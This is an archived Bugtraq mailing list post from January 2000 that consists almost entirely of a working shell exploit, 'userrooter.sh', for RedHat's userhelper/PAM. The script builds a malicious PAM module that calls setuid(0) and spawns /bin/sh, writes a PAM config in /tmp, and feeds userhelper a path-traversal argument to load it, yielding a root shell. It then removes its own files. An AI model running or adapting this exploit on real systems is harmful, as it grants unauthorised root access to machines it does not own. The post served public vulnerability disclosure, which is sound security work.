Bugtraq mailing list archives
userhelper/PAM exploit
From: super () CE NET (Derek Callaway)
Date: Wed, 5 Jan 2000 00:21:26 -0500
#!/bin/sh # userrooter.sh by S <super () innu org> # RedHat PAM/userhelper(8) exploit # Hi to inNUENdo! LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'` if [ $LAME -gt 15 ] then echo "Machine doesn't appear to be vulnerable :-\\" echo "Trying anyway..." fi cat << EOF >/tmp/hello-root.c #include<unistd.h> #include<stdlib.h> void pam_sm_authenticate(void){ setuid(0); puts("userrooter by S"); system("/bin/sh"); exit(EXIT_SUCCESS); } void pam_sm_setcred(void){ setuid(0); puts("userrooter by S"); system("/bin/sh"); exit(EXIT_SUCCESS); } EOF cat << EOF >/tmp/login #%PAM-1.0 auth required /tmp/pamper.so EOF gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c rm /tmp/hello-root.c chmod 0700 /tmp/login /usr/sbin/userhelper -w ../../../tmp/login rm /tmp/pamper.so rm /tmp/login -- /* Derek Callaway <super () ce net> char *sites[]={"http://www.geekwise.com", Programmer; CE Net, Inc. "http://www.freezersearch.com/index.cfm?aff=dhc", (302) 854-5440 Ext. 206 "http://www.homeworkhelp.org",0}; */
Current thread:
- Flaw in 3c59x.c or in Kernel? Sonny Parlin (Jan 04)
- Re: Flaw in 3c59x.c or in Kernel? Raymond Dijkxhoorn (Jan 04)
- Re: Flaw in 3c59x.c or in Kernel? Bill Paul (Jan 04)
- Re: Flaw in 3c59x.c or in Kernel? danny (Jan 04)
- userhelper/PAM exploit Derek Callaway (Jan 04)
- Re: Flaw in 3c59x.c or in Kernel? Raymond Dijkxhoorn (Jan 05)
- Re: Flaw in 3c59x.c or in Kernel? David Malone (Jan 05)
- Re: Flaw in 3c59x.c or in Kernel? Sonny Parlin (Jan 05)
- Re: Flaw in 3c59x.c or in Kernel? Jonathan Poole (Jan 05)
- Re: Flaw in 3c59x.c or in Kernel? Pug Bainter (Jan 05)
- Re: Flaw in 3c59x.c or in Kernel? Sonny Parlin (Jan 05)
- <Possible follow-ups>
- FW: Flaw in 3c59x.c or in Kernel? William R. Lorenz (Jan 05)